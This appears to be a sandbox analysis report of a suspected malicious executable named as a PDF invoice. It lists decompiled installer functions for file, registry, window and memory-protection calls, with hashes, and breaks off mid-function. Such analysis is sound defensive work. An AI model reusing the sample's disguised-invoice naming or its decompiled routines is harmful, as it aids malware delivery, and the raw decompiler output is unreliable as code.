                                                                                                  • String ID:
                                                                                                  • API String ID: 2831762973-0
                                                                                                  • Opcode ID: 336ee21dce7fe236a01c35d47a8697e130fb3ea5dcd58a3cb6936f6497ca76ff
                                                                                                  • Instruction ID: 4b991d54845a8f4c2efe32c9125b9baad4d8851bb675889a970d9a4240a8a0e2
                                                                                                  • Opcode Fuzzy Hash: 336ee21dce7fe236a01c35d47a8697e130fb3ea5dcd58a3cb6936f6497ca76ff
                                                                                                  • Instruction Fuzzy Hash: 23F0F632A041149BE710BBA49B4EABEB2A5AB44354F16003FFA02F31C1CEFC4D01876D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00401573(void* __ebx) {
                                                                                                  				int _t4;
                                                                                                  				void* _t9;
                                                                                                  				struct HWND__* _t11;
                                                                                                  				struct HWND__* _t12;
                                                                                                  				void* _t16;
                                                                                                  
                                                                                                  				_t9 = __ebx;
                                                                                                  				_t11 =  *0x7a79f0; // 0x203c2
                                                                                                  				if(_t11 != __ebx) {
                                                                                                  					ShowWindow(_t11,  *(_t16 - 0x24)); // executed
                                                                                                  					_t4 =  *(_t16 - 0x28);
                                                                                                  				}
                                                                                                  				_t12 =  *0x7a7a04; // 0x403ba
                                                                                                  				if(_t12 != _t9) {
                                                                                                  					ShowWindow(_t12, _t4); // executed
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t16 - 4));
                                                                                                  				return 0;
                                                                                                  			}









                                                                                                  APIs
                                                                                                  • ShowWindow.USER32(000203C2,?), ref: 00401587
                                                                                                  • ShowWindow.USER32(000403BA), ref: 0040159C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ShowWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 1268545403-0
                                                                                                  • Opcode ID: e9d257a11957cecfd478a70c41151f4352c91d381a98e1f3aa8ce5a0ad929688
                                                                                                  • Instruction ID: 5269699cd9b299489618f1bbb9ba152c7ba26c22ef46d1a8c5e364d85c2f5657
                                                                                                  • Opcode Fuzzy Hash: e9d257a11957cecfd478a70c41151f4352c91d381a98e1f3aa8ce5a0ad929688
                                                                                                  • Instruction Fuzzy Hash: B5E086777041049FCB19DBA8ED808AE77A6FB85310718457FE502F3690CA79AD50CF68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00406639(signed int _a4) {
                                                                                                  				struct HINSTANCE__* _t5;
                                                                                                  				signed int _t10;
                                                                                                  
                                                                                                  				_t10 = _a4 << 3;
                                                                                                  				_t8 =  *(_t10 + 0x40a3e0);
                                                                                                  				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                                                                  				if(_t5 != 0) {
                                                                                                  					L2:
                                                                                                  					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                                                                  				}
                                                                                                  				_t5 = E004065C9(_t8); // executed
                                                                                                  				if(_t5 == 0) {
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  				goto L2;
                                                                                                  			}






                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                                                                    • Part of subcall function 004065C9: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                                                                                    • Part of subcall function 004065C9: wsprintfW.USER32 ref: 0040661B
                                                                                                    • Part of subcall function 004065C9: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040662F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 2547128583-0
                                                                                                  • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                                                  • Instruction ID: 7f6190fd0785004a6ee8fc72a27bac991e5bdadb2fb285410322192917ba6648
                                                                                                  • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                                                  • Instruction Fuzzy Hash: AFE02C322042016AC2009A30AE40C3B33A89A88310303883FFA02F2081EB398C31AAAD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 68%
                                                                                                  			E00405D51(WCHAR* _a4, long _a8, long _a12) {
                                                                                                  				signed int _t5;
                                                                                                  				void* _t6;
                                                                                                  
                                                                                                  				_t5 = GetFileAttributesW(_a4); // executed
                                                                                                  				asm("sbb ecx, ecx");
                                                                                                  				_t6 = CreateFileW(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                  				return _t6;
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
                                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesCreate
                                                                                                  • String ID:
                                                                                                  • API String ID: 415043291-0
                                                                                                  • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                  • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                  • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                  • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405D2C(WCHAR* _a4) {
                                                                                                  				signed char _t3;
                                                                                                  				signed char _t7;
                                                                                                  
                                                                                                  				_t3 = GetFileAttributesW(_a4); // executed
                                                                                                  				_t7 = _t3;
                                                                                                  				if(_t7 != 0xffffffff) {
                                                                                                  					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                                                  				}
                                                                                                  				return _t7;
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00405931,?,?,00000000,00405B07,?,?,?,?), ref: 00405D31
                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D45
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                  • Instruction ID: 706934cb3b0fb70b74806e5ec6ddb1c8dfd6769152cd575e6ec3c276ff28a2a3
                                                                                                  • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                  • Instruction Fuzzy Hash: 85D01272504420AFD6512738EF0C89BBF95DB543717028B36FAE9A22F0CB304C568A98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040580F(WCHAR* _a4) {
                                                                                                  				int _t2;
                                                                                                  
                                                                                                  				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                                  				if(_t2 == 0) {
                                                                                                  					return GetLastError();
                                                                                                  				}
                                                                                                  				return 0;
                                                                                                  			}




                                                                                                  APIs
                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403343,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 00405815
                                                                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405823
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1375471231-0
                                                                                                  • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                  • Instruction ID: 364d0df367319b35fd7f444a265edab083d6b2b9b53b3b0e5bc7a719fbea1b4c
                                                                                                  • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                  • Instruction Fuzzy Hash: 29C08C312105019AC7002F20EF08B173E50AB20380F058839E546E00E0CE348064D96D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 33%
                                                                                                  			E004027E9(intOrPtr __edx, void* __eflags) {
                                                                                                  				long _t8;
                                                                                                  				long _t10;
                                                                                                  				LONG* _t12;
                                                                                                  				void* _t14;
                                                                                                  				intOrPtr _t15;
                                                                                                  				void* _t17;
                                                                                                  				void* _t19;
                                                                                                  
                                                                                                  				_t15 = __edx;
                                                                                                  				_push(ds);
                                                                                                  				if(__eflags != 0) {
                                                                                                  					_t8 = E00402C15(2);
                                                                                                  					_pop(_t14);
                                                                                                  					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
                                                                                                  					_t10 = SetFilePointer(E004061BF(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
                                                                                                  					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
                                                                                                  						_push(_t10);
                                                                                                  						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                                                                  						E004061A6();
                                                                                                  					}
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t19 - 4));
                                                                                                  				return 0;
                                                                                                  			}











                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                                                                    • Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FilePointerwsprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 327478801-0
                                                                                                  • Opcode ID: 876bb964a1d0d5fa4607f701cb9d9138871ffb593e28fb7de57c31c7f2bc0863
                                                                                                  • Instruction ID: 21d8c208f5d5b54c8d66c8a0ecd09dde93b5cc4591d01b86724f3e283dce4822
                                                                                                  • Opcode Fuzzy Hash: 876bb964a1d0d5fa4607f701cb9d9138871ffb593e28fb7de57c31c7f2bc0863
                                                                                                  • Instruction Fuzzy Hash: B0E06D72A00104AEDB11EBA5AE498AE7779EB80304B18803BF101F51D2CA790D128A2E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00401735() {
                                                                                                  				long _t5;
                                                                                                  				WCHAR* _t8;
                                                                                                  				WCHAR* _t12;
                                                                                                  				void* _t14;
                                                                                                  				long _t17;
                                                                                                  
                                                                                                  				_t5 = SearchPathW(_t8, E00402C37(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
                                                                                                  				_t17 = _t5;
                                                                                                  				if(_t17 == 0) {
                                                                                                  					 *((intOrPtr*)(_t14 - 4)) = 1;
                                                                                                  					 *_t12 = _t8;
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t14 - 4));
                                                                                                  				return 0;
                                                                                                  			}









                                                                                                  APIs
                                                                                                  • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PathSearch
                                                                                                  • String ID:
                                                                                                  • API String ID: 2203818243-0
                                                                                                  • Opcode ID: 875acb00c645770f213fe7cf4565295393cc7a65273a1ece8f838635e2e5a846
                                                                                                  • Instruction ID: 1a21f3817f07a007d07fb30ace0b1820adccec601593f7c7bbd26e2b342b2bae
                                                                                                  • Opcode Fuzzy Hash: 875acb00c645770f213fe7cf4565295393cc7a65273a1ece8f838635e2e5a846
                                                                                                  • Instruction Fuzzy Hash: 33E048B2704104AAD750DBA4DE49AAA7758DF40368B20853AF111E51C1D6B45941976D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004060FA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                  				void* _t7;
                                                                                                  				long _t8;
                                                                                                  				void* _t9;
                                                                                                  
                                                                                                  				_t7 = E00406051(_a4,  &_a12);
                                                                                                  				if(_t7 != 0) {
                                                                                                  					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                                  					return _t8;
                                                                                                  				}
                                                                                                  				_t9 = 6;
                                                                                                  				return _t9;
                                                                                                  			}







                                                                                                  APIs
                                                                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406123
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                  • Instruction ID: 1ce12e5a620d0377d06846f84a02a75369475120c61fa63bf0211ee428df1362
                                                                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                  • Instruction Fuzzy Hash: 67E0E6B2010109BEDF099F50DD0AD7B371DE704704F01492EFA06D4051E6B5E9706B74
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405E03(void* _a4, void* _a8, long _a12) {
                                                                                                  				int _t7;
                                                                                                  				long _t11;
                                                                                                  
                                                                                                  				_t11 = _a12;
                                                                                                  				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                  				if(_t7 == 0 || _t11 != _a12) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  			}






                                                                                                  APIs
                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,004032BB,000000FF,0078B6D8,?,0078B6D8,?,?,?,00000000), ref: 00405E17
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3934441357-0
                                                                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                  • Instruction ID: c8204e3b8f5822b3fc4a752f4075b10d4d5d267c9e9767057f3313d1a75d1f26
                                                                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                  • Instruction Fuzzy Hash: 38E0E632510559ABDF116F55DC00AEB775CFB05360F004436FD55E7150D671E9219BE4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405DD4(void* _a4, void* _a8, long _a12) {
                                                                                                  				int _t7;
                                                                                                  				long _t11;
                                                                                                  
                                                                                                  				_t11 = _a12;
                                                                                                  				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                  				if(_t7 == 0 || _t11 != _a12) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  			}






                                                                                                  APIs
                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,00403305,00000000,00000000,0040314C,?,?,00000000,00000000,00000000), ref: 00405DE8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                  • Instruction ID: b9e836fab2427aaa168680a15f0f0ce7fefe47de654f12bfd99ea101fd6ea48b
                                                                                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                  • Instruction Fuzzy Hash: 7DE0EC3222425EABDF509E559C04EEB7B6DEF05360F048837FD15E7160D631E921ABA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                  
                                                                                                  				 *0x10004048 = _a4;
                                                                                                  				if(_a8 == 1) {
                                                                                                  					VirtualProtect(0x1000405c, "true", 0x40, 0x1000404c); // executed
                                                                                                  					 *0x1000405c = 0xc2;
                                                                                                  					 *0x1000404c = 0;
                                                                                                  					 *0x10004054 = 0;
                                                                                                  					 *0x10004068 = 0;
                                                                                                  					 *0x10004058 = 0;
                                                                                                  					 *0x10004050 = 0;
                                                                                                  					 *0x10004060 = 0;
                                                                                                  					 *0x1000405e = 0;
                                                                                                  				}
                                                                                                  				return 1;
                                                                                                  			}




                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNELBASE(1000405C,?,00000040,1000404C), ref: 100027E0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                  • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                                                                  • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                  • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004060CC(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                  				void* _t7;
                                                                                                  				long _t8;
                                                                                                  				void* _t9;
                                                                                                  
                                                                                                  				_t7 = E00406051(_a4,  &_a12);
                                                                                                  				if(_t7 != 0) {
                                                                                                  					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                                  					return _t8;
                                                                                                  				}
                                                                                                  				_t9 = 6;
                                                                                                  				return _t9;
                                                                                                  			}







                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,0040615A,007A0F00,00000000,?,?,Call,?), ref: 004060F0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Open
                                                                                                  • String ID:
                                                                                                  • API String ID: 71445658-0
                                                                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                  • Instruction ID: ced63528db1e32a5bcf3a8a8acf2bd7baad3650648e26365f6afbd74657f9209
                                                                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                  • Instruction Fuzzy Hash: BED0123208020DBBDF219F909D01FAB375DAB04354F018436FE06E4190DB76D570AB14
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004015A3() {
                                                                                                  				int _t5;
                                                                                                  				void* _t11;
                                                                                                  				int _t14;
                                                                                                  
                                                                                                  				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
                                                                                                  				_t14 = _t5;
                                                                                                  				if(_t14 == 0) {
                                                                                                  					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t11 - 4));
                                                                                                  				return 0;
                                                                                                  			}







                                                                                                  APIs
                                                                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 6eb76b24ce870ef992c4327a1b2b518c4e6cabc1d7ccad815c10311b33b2bb2a
                                                                                                  • Instruction ID: 129b57beed9750de1dc8ac5f086523220a35585882bce30df6ddda6966387252
                                                                                                  • Opcode Fuzzy Hash: 6eb76b24ce870ef992c4327a1b2b518c4e6cabc1d7ccad815c10311b33b2bb2a
                                                                                                  • Instruction Fuzzy Hash: DFD01272B04104DBDB51DBE4AF0859D72A5AB50364B208577E101F11D1DABD89549B19
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004041F4(intOrPtr _a12) {
                                                                                                  				intOrPtr _v0;
                                                                                                  				struct HWND__* _v4;
                                                                                                  				int _t7;
                                                                                                  				void* _t8;
                                                                                                  				void* _t9;
                                                                                                  				void* _t10;
                                                                                                  
                                                                                                  				_t7 = SetDlgItemTextW(_v4, _v0 + 0x3e8, E00406281(_t8, _t9, _t10, 0, _a12)); // executed
                                                                                                  				return _t7;
                                                                                                  			}










                                                                                                  APIs
                                                                                                  • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040420E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ItemText
                                                                                                  • String ID:
                                                                                                  • API String ID: 3367045223-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404240(int _a4) {
                                                                                                  				struct HWND__* _t2;
                                                                                                  				long _t3;
                                                                                                  
                                                                                                  				_t2 =  *0x7a79f8; // 0x60020
                                                                                                  				if(_t2 != 0) {
                                                                                                  					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                                                  					return _t3;
                                                                                                  				}
                                                                                                  				return _t2;
                                                                                                  			}






                                                                                                  APIs
                                                                                                  • SendMessageW.USER32(00060020,00000000,00000000,00000000), ref: 00404252
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00403308(long _a4) {
                                                                                                  				long _t2;
                                                                                                  
                                                                                                  				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                                  				return _t2;
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403316
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: FilePointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 973152223-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404229(int _a4) {
                                                                                                  				long _t2;
                                                                                                  
                                                                                                  				_t2 = SendMessageW( *0x7a8a28, 0x28, _a4, "true"); // executed
                                                                                                  				return _t2;
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • SendMessageW.USER32(00000028,?,?,00404054), ref: 00404237
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404216(int _a4) {
                                                                                                  				int _t2;
                                                                                                  
                                                                                                  				_t2 = EnableWindow( *0x7a1f1c, _a4); // executed
                                                                                                  				return _t2;
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403FED), ref: 00404220
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 2492992576-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 78%
                                                                                                  			E00401F00() {
                                                                                                  				void* _t9;
                                                                                                  				intOrPtr _t13;
                                                                                                  				void* _t15;
                                                                                                  				void* _t17;
                                                                                                  				void* _t20;
                                                                                                  				void* _t22;
                                                                                                  
                                                                                                  				_t19 = E00402C37(_t15);
